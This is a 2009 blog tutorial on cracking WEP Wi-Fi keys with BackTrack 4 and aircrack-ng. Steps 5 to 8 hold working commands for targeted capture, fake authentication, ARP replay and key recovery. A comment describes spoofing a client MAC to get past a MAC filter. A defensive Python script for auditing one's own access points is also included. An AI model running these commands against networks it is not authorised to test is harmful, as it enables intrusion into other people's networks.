
My journal in Australia

Tuesday, November 17, 2009

Wep cracking with Backtrack 4

Where can I get BackTrack 4?
Download it from http://www.remote-exploit.org/

The latest version is an ISO file; what do I do with it?
The way I used is to download the tool called unetbootin-windows. It copies the whole Linux system contained in the ISO file onto a USB drive. After that, just boot your computer from the USB drive.


The video clip embedded here was made by yasir25119918.

Below are the steps to crack a WEP-protected AP. The lesson is that it's safer to use Ethernet instead of wireless; if you really want to use a wireless AP, using a high-security protection (WPA2) is very important. (WEP and WPA can already be cracked with the aircrack-ng suite, and since there are programs that can spoof a wireless card's MAC address, relying on a MAC filter still leaves you vulnerable.)

1. "airmon-ng" to find your wireless interface (such as wlan0, ra0, etc.)
2. "airmon-ng start ra0" to switch the interface from managed mode to monitor mode (ra0 is your interface name)
3. "airodump-ng ra0" to list all APs within range (refer to the table below for the meaning of each field, taken from http://www.aircrack-ng.org/doku.php?id=airodump-ng)

Field: Description

BSSID: MAC address of the access point. In the Client section, a BSSID of "(not associated)" means that the client is not associated with any AP. In this unassociated state, it is searching for an AP to connect with.

PWR: Signal level reported by the card. Its meaning depends on the driver, but as the signal gets higher you get closer to the AP or the station. If the BSSID PWR is -1, then the driver doesn't support signal level reporting. If the PWR is -1 for a limited number of stations, then this is for a packet which came from the AP to the client but the client's transmissions are out of range for your card, meaning you are hearing only half of the communication. If all clients have PWR as -1, then the driver doesn't support signal level reporting.

RXQ: Receive Quality as measured by the percentage of packets (management and data frames) successfully received over the last 10 seconds. See the linked airodump-ng documentation for a more detailed explanation.

Beacons: Number of announcement packets sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far away.

# Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.

#/s: Number of data packets per second measured over the last 10 seconds.

CH: Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.

MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b; if MB = 22, it's 802.11b+; higher rates are 802.11g. A dot after the rate (e.g. "54.") indicates short preamble is supported. An "e" following the MB speed value means the network has QoS enabled.

ENC: Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP is present.

CIPHER: The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater than 0. The standard states that the index can be 0-3 for 40-bit and should be 0 for 104-bit.

AUTH: The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).

ESSID: The so-called "SSID", which can be empty if SSID hiding is activated. In this case, airodump-ng will try to recover the SSID from probe responses and association requests.

STATION: MAC address of each associated station, or of stations searching for an AP to connect with. Clients not currently associated with an AP have a BSSID of "(not associated)".

Lost: The number of data packets lost over the last 10 seconds, based on the sequence number. See the linked airodump-ng documentation for a more detailed explanation.

Packets: The number of data packets sent by the client.

Probes: The ESSIDs probed by the client. These are the networks the client is trying to connect to if it is not currently connected.


4. Note down:
(1) Interface
(2) AP's name (ESSID)
(3) AP's BSSID
(4) AP's channel
5. "airodump-ng -w wep -c 11 --bssid 00:A0:C5:12:34:56 ra0" to lock onto the AP you want to crack and capture its packets
6. "aireplay-ng -1 0 -a 00:A0:C5:12:34:56 ra0" to associate yourself with the AP (fake authentication attack)
7. "aireplay-ng -3 -b 00:A0:C5:12:34:56 ra0"; wait until #Data reaches 30000, then press "Ctrl+c" to stop the command. The capture file is stored in the directory you are currently in. (ARP request replay attack)
8. "aircrack-ng wep.cap". The software will tell you the key has been found [05:61:31:AB:33] (aircrack-ng)
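The same airodump-ng output that step 3 relies on is also what you would use to audit your own site: its CSV export (the "-w" prefix from step 5 also writes a prefix-01.csv) lists every AP with the ENC, CIPHER and AUTH values described in the table above. The script below is an added example, not part of this post or of the aircrack-ng project: it parses a constructed sample in the layout of that CSV export (the column order is my assumption; check it against one of your own capture files), classifies each AP using the table's semantics, and reports which networks on your estate still run OPN, WEP or WPA/TKIP and therefore need to be moved to WPA2-CCMP. For WEP networks it also shows how many unique IVs the capture already holds relative to the 30000 that step 7 waits for, which is a measure of how much a purely passive listener has already collected.

```python
"""Inventory the access points in an airodump-ng CSV export and flag the ones
whose ENC/CIPHER/AUTH combination the airodump-ng field table marks as weak.
Added example; not code from the post or from the aircrack-ng project."""
import csv
import io

# Constructed sample in the layout of airodump-ng's CSV export (assumption:
# real files use this column order; verify against your own capture).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:A0:C5:12:34:56, 2009-11-17 10:00:01, 2009-11-17 10:05:01, 11, 54, WEP, WEP, OPN, -40, 300, 31250, 0.0.0.0, 7, lab-wep,
00:A0:C5:AA:BB:CC, 2009-11-17 10:00:01, 2009-11-17 10:05:01, 6, 54, WPA2, CCMP, PSK, -55, 280, 0, 0.0.0.0, 8, lab-wpa2,
00:A0:C5:DE:AD:01, 2009-11-17 10:00:01, 2009-11-17 10:05:01, 1, 11, OPN, , , -70, 120, 0, 0.0.0.0, 5, guest,
00:A0:C5:00:11:22, 2009-11-17 10:00:01, 2009-11-17 10:05:01, 3, 54, WPA, TKIP, PSK, -62, 250, 0, 0.0.0.0, 6, legacy,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1C:B3:11:22:33, 2009-11-17 10:00:05, 2009-11-17 10:04:59, -50, 1200, 00:A0:C5:12:34:56, lab-wep
"""

# Unique-IV count the post treats as enough for aircrack-ng to recover a WEP
# key; used here only to express how far a passive capture has progressed.
WEP_IV_THRESHOLD = 30000


def parse_access_points(text):
    """Return the AP section of an airodump-ng CSV as a list of dicts keyed by
    the stripped header names. The station section after the blank line is
    ignored, and CRLF line endings are normalised first."""
    ap_section = text.replace("\r\n", "\n").split("\n\n", 1)[0]
    reader = csv.reader(io.StringIO(ap_section), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    rows = []
    for row in reader:
        if not row or not row[0].strip():
            continue
        # Pad short rows so a missing trailing "Key" column does not break zip().
        cells = [c.strip() for c in row] + [""] * (len(header) - len(row))
        rows.append(dict(zip(header, cells)))
    return rows


def assess(ap):
    """Map one AP row to (severity, reason) using the ENC/CIPHER/AUTH meanings
    from the airodump-ng field table."""
    enc, cipher, auth = ap["Privacy"], ap["Cipher"], ap["Authentication"]
    ivs = int(ap["# IV"] or 0)
    if enc == "OPN":
        return "CRITICAL", "no encryption: traffic is readable by anyone in range"
    if enc == "WEP?":
        return "HIGH", "WEP or higher, not enough frames yet to tell; rescan"
    if enc.startswith("WEP"):
        pct = ivs * 100 // WEP_IV_THRESHOLD
        return "CRITICAL", (f"WEP ({auth or 'unknown'} auth): {ivs} unique IVs "
                            f"captured ({pct}% of the post's cracking threshold)")
    if enc == "WPA" or cipher == "TKIP":
        return "HIGH", f"{enc}/{cipher}: TKIP is deprecated, move to WPA2-CCMP"
    if enc == "WPA2" and cipher == "CCMP":
        if auth == "PSK":
            return "INFO", "WPA2-CCMP with PSK: fine if the passphrase is long and random"
        return "OK", f"WPA2-CCMP with {auth} authentication"
    return "REVIEW", f"unrecognised combination {enc}/{cipher}/{auth}"


def report(text):
    """Return [(essid, bssid, channel, severity, reason)], worst first."""
    order = {"CRITICAL": 0, "HIGH": 1, "REVIEW": 2, "INFO": 3, "OK": 4}
    findings = []
    for ap in parse_access_points(text):
        severity, reason = assess(ap)
        findings.append((ap["ESSID"], ap["BSSID"], ap["channel"], severity, reason))
    findings.sort(key=lambda f: order[f[3]])
    return findings


if __name__ == "__main__":
    for essid, bssid, channel, severity, reason in report(SAMPLE_CSV):
        print(f"{severity:8} {essid:10} {bssid} ch{channel:>2}  {reason}")
```

To run it against a real export, replace SAMPLE_CSV with the contents of your prefix-01.csv; anything the script reports as CRITICAL or HIGH is a network that the steps above (or a quieter, purely passive listener) can get into, and the fix is the one the post already states: WPA2 with a strong pre-shared key, not a MAC filter.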

6 comments:

pastmedia said...

There is a possibility that when you run airmon-ng your chipset and interface will not appear.

Happy Life said...

I reckon it's possible because the driver may not be supported yet.

Cage Matthews said...

When I tried this... I don't know if the AP's MAC filtering was on or what... but it won't authenticate me... what can I do?

Happy Life said...

Maybe you can find a MAC address which is allowed in the filtering table from the STATION field. Then use MAC spoofing, http://www.aircrack-ng.org/doku.php?id=faq#how_do_i_change_my_card_s_mac_address
But there might be another problem: a MAC conflict could happen when the real NIC with the same MAC as your spoofed one is in use at the same time.

johnnie w said...

This works like a charm. If the WEP auth=OPN, what should be done differently?

Anonymous said...

I can see that you are an expert in your field! I am launching a website soon, and your information will be very useful for me. Thanks for all your help and wishing you all the success in your business.